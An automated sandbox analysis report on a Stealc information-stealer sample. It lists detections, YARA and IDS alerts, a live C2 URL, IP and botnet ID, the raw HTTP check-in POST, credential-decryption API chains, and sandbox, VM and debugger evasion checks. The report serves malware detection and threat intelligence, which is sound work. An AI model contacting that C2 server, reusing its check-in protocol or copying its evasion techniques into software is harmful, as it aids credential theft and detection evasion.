Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532502
MD5: 33f53a09cb02c7459d8723408c86ebbe
SHA1: db007d0f88f66d60e9740ac561ee622ed65fd936
SHA256: e0e099a250b184d85c84fff09038ae8efa95f967143811bb72032d36f5eb30c0
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 33F53A09CB02C7459D8723408C86EBBE)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7472 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.3d0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-13T13:59:37.994165+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.3d0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37//Q | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php? | Virustotal: Detection: 20%
Source: http://185.215.113.37/e2b1563c6670f193.phpC | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpw | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 39 34 46 32 38 36 39 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a
    Data Ascii:
    ------CFHDHIJDGCBAKFIEGHCB
    Content-Disposition: form-data; name="hwid"

    E6A94F286967943400063
    ------CFHDHIJDGCBAKFIEGHCB
    Content-Disposition: form-data; name="build"

    doma
    ------CFHDHIJDGCBAKFIEGHCB--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 41 39 34 46 32 38 36 39 36 37 39 34 33 34 30 30 30 36 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a
    Data Ascii:
    ------CFHDHIJDGCBAKFIEGHCB
    Content-Disposition: form-data; name="hwid"

    E6A94F286967943400063
    ------CFHDHIJDGCBAKFIEGHCB
    Content-Disposition: form-data; name="build"

    doma
    ------CFHDHIJDGCBAKFIEGHCB--
Source: file.exe, 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/(Q
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37//Q
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/6Q
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718945
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067EA6E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067BAB4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079BAA4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00791B19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00787BC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00793C7A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008984FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079D4DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A0D6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007865D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00798E47
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007896A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078B779
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00821705
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007437E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079FFBA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078EF9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0078D78A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00693790
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003D45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: midxwoqt ZLIB complexity 0.9945646666537986
Source: file.exe, 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\2YTZ3CYY.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1814528 > 1048576
Source: file.exe | Static PE information: Raw size of midxwoqt is bigger than: 0x100000 < 0x194c00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.3d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;midxwoqt:EW;dekzctjc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;midxwoqt:EW;dekzctjc:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c21c2 should be: 0x1c6db7
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: midxwoqt
Source: file.exe | Static PE information: section name: dekzctjc
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB06F push esi; mov dword ptr [esp], 68FB6FC6h (0_2_006DB0C2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DB06F push 073338D5h; mov dword ptr [esp], edx (0_2_006DB12A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EB035 push ecx; ret (0_2_003EB048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00850893 push eax; mov dword ptr [esp], esi (0_2_008508C5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00850893 push ebx; mov dword ptr [esp], 71181D81h (0_2_008508E0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00850893 push ebx; mov dword ptr [esp], edi (0_2_00850942)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F8831 push edi; mov dword ptr [esp], ebp (0_2_007F8859)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D300D push ecx; mov dword ptr [esp], ebx (0_2_007D3044)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D300D push ebx; mov dword ptr [esp], ebp (0_2_007D3253)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008AE010 push edi; mov dword ptr [esp], edx (0_2_008AE03A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00817021 push 6D582796h; mov dword ptr [esp], edx (0_2_00817061)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00817021 push edi; mov dword ptr [esp], 76F7B661h (0_2_00817090)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087B841 push edi; mov dword ptr [esp], ecx (0_2_0087BEBE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083C9A5 push 796FF150h; mov dword ptr [esp], ebp (0_2_0083CA63)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718945 push 6DF12072h; mov dword ptr [esp], ecx (0_2_007189A9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718945 push edi; mov dword ptr [esp], eax (0_2_00718A3D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718945 push edi; mov dword ptr [esp], 00000000h (0_2_00718A44)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00718945 push edi; mov dword ptr [esp], edx (0_2_00718AAA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081A9B7 push 543ED457h; mov dword ptr [esp], ecx (0_2_0081A9FD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080B9BA push 28340AEDh; mov dword ptr [esp], eax (0_2_0080B9E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push edx; mov dword ptr [esp], 37F146D8h (0_2_0079AA1C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push 45E97ECBh; mov dword ptr [esp], esi (0_2_0079AA46)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push edi; mov dword ptr [esp], ebx (0_2_0079AA5B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push ecx; mov dword ptr [esp], 7BEEC700h (0_2_0079AA5F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push 59C2F190h; mov dword ptr [esp], esi (0_2_0079AA73)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push eax; mov dword ptr [esp], ebp (0_2_0079AAD5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push edi; mov dword ptr [esp], esi (0_2_0079AAF9)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push 053F98BCh; mov dword ptr [esp], ebx (0_2_0079AB0F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push ecx; mov dword ptr [esp], edi (0_2_0079ABD8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push 15AA56A6h; mov dword ptr [esp], ebp (0_2_0079ACEB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079A946 push edi; mov dword ptr [esp], edx (0_2_0079AD87)
Source: file.exe | Static PE information: section name: midxwoqt entropy: 7.953836715347976

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13659)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A400C second address: 7A4010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A329A second address: 7A32A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A32A2 second address: 7A32D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C6956DA54h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C6956DA59h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A32D8 second address: 7A32DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A32DC second address: 7A32E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3411 second address: 7A3435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pushad 0x00000007 jg 00007F6C698AAEEAh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 jno 00007F6C698AAEE6h 0x00000018 jmp 00007F6C698AAEEAh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3592 second address: 7A3597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3597 second address: 7A35A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A36D1 second address: 7A36D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A36D7 second address: 7A36F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6C698AAEF6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A36F7 second address: 7A36FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A36FB second address: 7A36FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A36FF second address: 7A3705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3845 second address: 7A3855 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F6C698AAEE6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A3855 second address: 7A3859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7A7768 second address: 7A7787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F6C698AAEF3h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
